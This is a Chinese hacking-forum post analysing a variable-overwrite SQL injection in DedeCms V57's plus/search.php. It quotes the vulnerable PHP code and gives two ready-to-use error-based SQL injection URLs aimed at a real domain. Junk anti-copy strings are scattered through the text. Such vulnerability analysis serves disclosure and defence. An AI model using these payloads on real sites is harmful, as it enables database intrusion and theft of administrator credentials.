中国网络渗透测试联盟
标题:
DedeCms V57 plus/search.php文件SQL注射
[打印本页]
作者:
admin
时间:
2013-1-19 08:18
标题:
DedeCms V57 plus/search.php文件SQL注射
微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
8 }; I. K1 C( I
作者:
c4rp3nt3r@0x50sec.org
$ A$ Y) _5 X" i. j
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
% r+ K* N3 @# H( e% S0 d
0 Q' F& c) n1 J, X# L7 z
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
" ? V9 u$ z! b2 h1 o8 I
3 v7 M4 E# K. B) s
============
$ h2 U& q3 _8 t, o& E3 x
" ]% z7 j0 [+ ~4 H+ N" y9 C# R
6 Q2 I# d2 k/ N1 ~" A4 @
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
0 s7 }# f2 V0 I+ n/ M
% g0 t0 q7 o+ v9 ]3 F4 u
require_once(dirname(__FILE__).”/../include/common.inc.php”);
+ |) s% H' [. D+ s% z# o, D
require_once(DEDEINC.”/arc.searchview.class.php”);
: [' w6 e, Y; {+ T/ V4 P5 ^& n, U
1 E8 _: h8 j4 m/ U- U$ b
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
3 q- I3 e& N4 y& T. S
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
" b* a" u4 k( m2 T G; K& B2 c: i
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
) x/ C; q0 F% W+ ?0 h
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
1 X- j7 p+ y$ t: j/ y, j
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
- \! n" D) C/ n. d. M
0 F; w. k; M# A' _; T+ C, M8 y
if(!isset($orderby)) $orderby=”;
+ P' {; X" }$ i8 a
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
( A1 Q% O9 I1 I3 u" D, ~! T+ K' x: V: ^
! _( ~7 [5 e( k# @: n# f
1 |0 x" e' {" [# L4 ?
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
, {# h0 H' D- c9 M/ d8 w
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
. ~' U0 I# r+ Y0 I- [8 q0 S1 ]
3 v% M {7 h, K
if(!isset($keyword)){
# i, R9 v7 d5 T; _! N* B
if(!isset($q)) $q = ”;
) ?4 D5 s, O* `+ l, W& a1 C7 | u
$keyword=$q;
( a N5 F0 q2 E
}
) ~% K! x" f3 }( F9 A& g* V
+ P! j! t& a0 H+ B
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
6 M* l1 {2 O1 p% m
P/ B3 `- S) v0 Z+ ~! V
//查找栏目信息
- p& P/ d0 L9 ^8 F+ I
if(empty($typeid))
: d) t! X! L& s- X$ V+ G' I
{
' p, e1 k1 ^, h2 I1 t8 A7 x
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
$ c7 z' h3 q) k% e. F( U
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
' k3 z- m2 e, L# j/ [
{
9 ]3 f) Q" p y9 v+ l$ c
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
- [1 ?$ d- A9 S7 b9 J+ [: p7 H8 R' G
fwrite($fp, “<”.”?php\r\n”);
/ I' U% @! w, U+ o+ u& v
$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
# R% t2 T/ \3 A& t4 n9 N8 o
$dsql->Execute();
1 _! w. s7 ^( N3 m* @3 z1 g
while($row = $dsql->GetArray())
- f: O* t3 ?3 ]6 O# o! \
{
( u3 z! n7 l3 X4 T9 \
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
: v- [, N* M* s% m# I' u- d9 r
}
- i. a. `/ {% s! a g/ s9 A& j
fwrite($fp, ‘?’.'>’);
# z* p& k: e8 b# u- F! ?
fclose($fp);
& N C7 ^$ G. t( Y; g6 Q
}
5 f4 O1 r* K% }$ ^8 g
//引入栏目缓存并看关键字是否有相关栏目内容
# M, v V5 V, O' M3 w/ i
require_once($typenameCacheFile);
/ Y8 b1 O" v! H$ x
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
1 g9 n1 h" s$ R
//
" a0 B- m. w1 t! P1 T; M5 b0 w$ v
if(isset($typeArr) && is_array($typeArr))
. ^9 a8 E) C3 _. s- A! @
{
1 B- o7 u* A2 [% F- Q) ~
foreach($typeArr as $id=>$typename)
# c1 w/ g; Y& Q! T5 i! N+ t; f
{
5 S! ]1 Q4 u" l, C
# J' J: e# |* B# ]1 h1 ^
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
& K2 e" F6 E, D6 P" T3 E
if($keyword != $keywordn)
( a3 e4 m+ Z. A
{
, H" \2 e8 i6 o; B
$keyword = $keywordn;
% i) k5 K N% r0 H1 i. e) q! E( Q
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
/ B7 i/ k6 L( P2 Z# u! L4 L
break;
6 z6 D" ?; r: P6 Z3 H5 K, J
}
7 @/ w! F( r4 L9 C% U3 i* I
}
z% K* r% b6 B6 n7 D' O1 c
}
; b) Z; ? v! T
}
4 h7 q9 o( o6 [9 e+ [4 s+ a
然后plus/search.php文件下面定义了一个 Search类的对象 .
9 m4 k; x( ^9 t1 X2 U0 D5 }
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
* O5 o- {/ V, G8 O3 b' G
$this->TypeLink = new TypeLink($typeid);
- k0 Q+ i! E7 I9 d; b: k
* q/ j) h0 K& Z
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
3 u9 @7 `) V) I/ ~1 D3 \! d0 B# X
$ n$ \& ]* [8 O! [/ I- _ R3 x# E9 p
class TypeLink
, N; ?% G4 ?0 |2 q+ ?# l
{
3 Y$ @% a) l2 p, U: L# S( J+ b5 G& x
var $typeDir;
+ s s' _7 _/ l- ~' i' a( i( H
var $dsql;
. Z2 x( c0 {" U: X4 A) t% j
var $TypeID;
6 B! h2 H1 X- U- Z; E& o8 ~0 F+ o" i
var $baseDir;
5 z! X+ ?7 N, }
var $modDir;
* w3 k: b' G: F& x+ i
var $indexUrl;
. O; x+ Y0 K1 q
var $indexName;
1 G9 R& l$ x: \( M# w* l
var $TypeInfos;
9 o" s+ J) i# F) [* w R7 ?5 ~
var $SplitSymbol;
: X* X! B3 A$ V2 }3 L( a+ A$ s
var $valuePosition;
. C) ]& `4 `5 X
var $valuePositionName;
2 {6 n9 A2 B) ]# X7 c1 }* T+ O
var $OptionArrayList;//构造函数///////
, e- o4 I8 Q& G/ L" e1 `
//php5构造函数
) b* S" v% t; U) Q% O! V! |
function __construct($typeid)
, C% ~6 N( |: D3 g
{
( W1 v: H! g. u+ J1 L) [
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
0 Z; B$ L, N- g9 u
$this->indexName = $GLOBALS['cfg_indexname'];
* T* z" H' H) M4 g
$this->baseDir = $GLOBALS['cfg_basedir'];
) l$ r8 \; H+ N+ b! l
$this->modDir = $GLOBALS['cfg_templets_dir'];
9 `3 J, l2 E7 B0 y! Q
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
" B( u6 ?# X8 x5 d( l* {% z
$this->dsql = $GLOBALS['dsql'];
4 `/ H8 g: f: D7 W+ J( F# G
$this->TypeID = $typeid;
+ O$ J# E* p, S6 L
$this->valuePosition = ”;
9 O" ]3 R# k+ Y8 S
$this->valuePositionName = ”;
7 v) l/ _* } M8 h D
$this->typeDir = ”;
4 C1 m7 Q+ h; ]
$this->OptionArrayList = ”;
/ E' f5 \% P1 `% z
8 ~$ o8 _. {3 H8 G2 }- U
//载入类目信息
! n3 T; r$ c4 k# q* \; P X
% P% c2 O" L- V; C& R$ w/ f P
<font color=”Red”>$query = “SELECT tp.*,ch.typename as
\" [3 ~( O- O% P$ I
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
9 s, A& T" e+ ]3 a+ `6 k
`#@__channeltype` ch
2 U1 t: A, c, B# _
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
/ l* F/ D* h5 D/ ]+ W
# G; e1 {/ a# M; p! U9 T
if($typeid > 0)
/ f& {9 @1 U4 a$ y$ Y2 R
{
" H" b; O/ {$ e$ k
$this->TypeInfos = $this->dsql->GetOne($query);
$ B* ^/ Z v1 L3 I# |
利用代码一 需要 即使magic_quotes_gpc = Off
8 o X# H) o4 }! d ^
. x4 \/ m' ?1 L* J. a6 T
www.political-security.com
/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
- [& O# N9 y2 y) \
- \, s2 t% ~# u3 G% Y% a/ S
这只是其中一个利用代码… Search 类的构造函数再往下
+ L$ E3 M! Q0 M5 z0 `: \
5 _7 \# Z5 O) p, ]
……省略
8 Y/ _! ]0 R I0 R
$this->TypeID = $typeid;
1 W% T+ V$ \, D. S
……省略
/ G( N) b. W. Z+ a; H# e7 |
if($this->TypeID==”0″){
( N9 \+ n2 Q& \; B9 H, Z
$this->ChannelTypeid=1;
) e3 ~& r6 s% ]. t8 ~2 C) U0 D
}else{
+ T7 s7 l) p( [. Z
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
& C& T% M' c3 X- @! p
//现在不鸡肋了吧亲…
" g" M& r# |8 ?) G9 R% N
$this->ChannelTypeid=$row['channeltype'];
+ b5 f- T: j9 a) ]' {
' r6 G* O# o# m% Y' g
}
* E) |, L- f1 n/ B# y" p
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
' V1 e1 C6 W0 e# y* C
5 q/ h6 ? V, Q3 N4 ]; @7 s% O
www.political-security.com
/plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
: k& j* T. B# q3 g1 f! g' \3 F/ @
7 t7 H5 C% N5 x* z! ~( l
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
3 V* [$ ?7 l( O5 D7 G
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2